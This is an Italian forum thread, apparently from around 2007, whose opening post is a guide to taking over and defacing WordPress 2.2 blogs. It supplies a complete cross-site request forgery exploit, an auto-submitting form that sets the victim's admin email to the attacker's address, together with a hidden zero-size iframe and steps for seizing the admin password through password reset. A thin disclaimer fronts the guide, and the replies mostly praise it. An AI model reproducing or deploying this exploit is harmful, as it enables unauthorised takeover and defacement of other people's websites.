Toggle sidebar
  • Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

[GUIDA] Defacciare un Blog WordPress

M

Magio95

Utente bannato
Autore del topic
11 Dicembre 2007
419
0
Miglior risposta
0
QUESTA GUIDA E' STATA CREATA PER PURO SCOPO DIDATTICO ED ILLUSTRATIVO, QUINDI MAGIO95 E LO STAFF DELLO SCIAX2 FORUM NON SI ASSUMONO ALCUNA RESPONSABILITA' DI CIO' CHE NE VERRA' FATTO DA TERZI.

Questa guida è compatibile con la versione 2.2 di Wordpress ed i relativi aggiornamenti come 2.2.1, 2.2.2 e 2.2.3 che posterò in seguito se vorrete fare una prova sul vostro sito.

Allora, iniziamo con una breve introduzione.
In questa guida vi spiegherò come loggarsi ad un blog su piattaforma Wordpress servendosi di un exploit.
L'Exploit agirà cambiando l'email di registrazione all'amministratore nella vostra e-mail, in modo che potrete richiedere la password come se fosse stata smarrita, ed appropriarsi dell'account amministratore.

Quel che ci serve è uno spazio web su cui upperebo l'exploit, il sito della vittima e l'exploit che in seguito fornirò.

Bene, dopo esserci procurati l'occorrente, seguite questi semplici passi.

- Copiare ed incollare il codice dell'exploit su Blocco Note, editarlo come citato in seguito e salvarlo come "exploit.html".
- Copiare ed incollare il codice del frame su Blocco Note e salvarlo come "iframe.html".
- Eseguire l'upload di entrambi i file sul proprio spazio web.

Codice Exploit
<html>
<body>
<h2>Exploit WordPress by Magio95 - Www.Magio95.Com</h2>

<form name="profile" id="your-profile" action="http://
Perfavore, Entra oppure Registrati per vedere i Link!
/wp-admin/user-edit.php" method="post">
<input name="user_id" id="user_id" value="1" type="hidden">
<input name="action" value="update" type="hidden">
<input name="_wpnonce" value="37578b2c7a" type="hidden><input name="_wp_http_referer" value="http://
Perfavore, Entra oppure Registrati per vedere i Link!
/wp-admin/user-edit.php?user_id=1&amp;wp_http_referer=%2Fwp%2Fwordpress%2Fwp-admin%2Fusers.php" type="hidden"> <input name="wp_http_referer" value="http://
Perfavore, Entra oppure Registrati per vedere i Link!
/wp-admin/user.php" type="hidden">
<p>
<input name="from" value="profile" type="hidden">
<input name="chechuser_id" value="1" type="hidden">
</p>

<p><label for="rich_editing"><input name="rich_editing" id="rich_editing" value="true" checked="checked" type="checkbox"> Use the visual editor when writing</label></p>

<fieldset>
<legend>Name</legend>
<p><label>Username: (no editing)<br>
<input name="user_login" value="admin" disabled="disabled" type="text">
</label><p>

<p><label>Role:<br>
<select name="role"><option value="administrator" selected="selected">Administrator</option></select></label></p>

<p><label>Nickname:<br>
<input name="nickname" value="admin" type="text"></label></p>
</fieldset>

<fieldset>
<p><label>E-mail:<br>
<input name="email" value="info@sito.com" type="text" size="20"></label></p>

</p>
</fieldset>
<br clear="all">
&nbsp;</form>
<script> document.body.onload = document.forms[0].submit();</script>
</div>
</body></html>
Clicca per espandere...

Codice Frame
<html>
<body>
<iframe src="http://
Perfavore, Entra oppure Registrati per vedere i Link!
exploit.html" heigh="0" width="0"></iframe>
</body>
</html>
Clicca per espandere...

Dovete modificare le URL indicate in grassetto-sottolineato con il sito della vittima e le relative directory, per esempio se il blog si trova su
Perfavore, Entra oppure Registrati per vedere i Link!
dovrete mettere /blog dopo l'URL del sito.

In oltre dovrete modificare nel codice dell'Exploit la scritta admin con il nickname dell'admin e l'email con il vostro indirizzo e-mail.

Una volta uppato il tutto sul vostro sito, non dovrete fare altro che visitare per esempio
Perfavore, Entra oppure Registrati per vedere i Link!
e lasciare caricare la pagina finchè in basso a sinistra della finestra del browser non verrà visualizzata la scritta Completato o Fine.
Se verranno visualizzate una delle due scritte, l'Exploit dovrebbe essere stato eseguito con successo.

Ora non dovrete fare altro che andare su
Perfavore, Entra oppure Registrati per vedere i Link!
e cliccare sulla voce "Password Smarrita" sotto la finestra di login ed inserire il nome amministratore e la vostra e-mail che avete deciso di utilizzare quando avete editato l'Exploit.

Non dovrete fare altro che cliccare su "Richiedi Password" e dovreste ricevere una e-mail contenente la password.

Ecco fatto, ora avete la password dell'amministratore...
Buon divertimento!

Guida creata interamente da Magio95 per lo Sciax2 Forum e il Magio95 Forum.

Potete copiarla dove volete a patto che inseriate i diritti.



Wordpress 2.2.1:
Perfavore, Entra oppure Registrati per vedere i Link!

Wordpress 2.2.2:
Perfavore, Entra oppure Registrati per vedere i Link!

Wordpress 2.2.3:
Perfavore, Entra oppure Registrati per vedere i Link!

Video Tutorial: In creazione...

[cc]Creative Commons[/cc]
 
Ultima modifica:
Grazie, ora rimuovo lo spam, dato che avevo inserito il link al mios ito per il mio Forum e i sono dimenticato di toglierlo!

EDIT: Fatto :spam:

EDIT: Aggiungo informazioni che ho dimenticato...

EDIT: Presto un video tutorial...
 
Ultima modifica:
Exterminetor "uppare" significa mettere i file su un sito, in questo caso un sito che ti crei su altervista per esempio. Li scrivi sul blocco note, li salvi come dovuto e li "uppi" con FileZilla o col pannello di controllo di Altervista.
 
:emoji_relieved: Non tutti hanno la voglia di imparare e apprendere nozioni informatiche, magari si divertono di piu' coi giochi..
 
xD quoto xD
anch'io forse mi divertirei di più con i gioki , ma se non ho un computer decente ... devo farne a meno ;)

magio , ma per
Perfavore, Entra oppure Registrati per vedere i Link!
intendi il nostro dominio dove uppare l'exploit ed il resto?
 
Ultima modifica:
omg , la gente si legge guide di exploit e cose simili mentre non sa manco uppare ? O_O
Comunque magio bella guida complimenti , inoltre molto semplice da comprendere...
Ehm.. secondo me non è necessario un video... si capisce già abbastanza... Lo dico perchè è inutile dare la pappa pronta a tutti ... Senno cosa ci capiscono in fondo ? Diventano lamers e basta...Vabbe ...
 
asp.. nn ho capito perchè ci hai messo il link di wordpress.. serve nella guida?
oppure è per provare a farlo sui nostri forum (x non lamerare)
 
Devi accedere o registrarti per rispondere qui.
 
 
Top
Indietro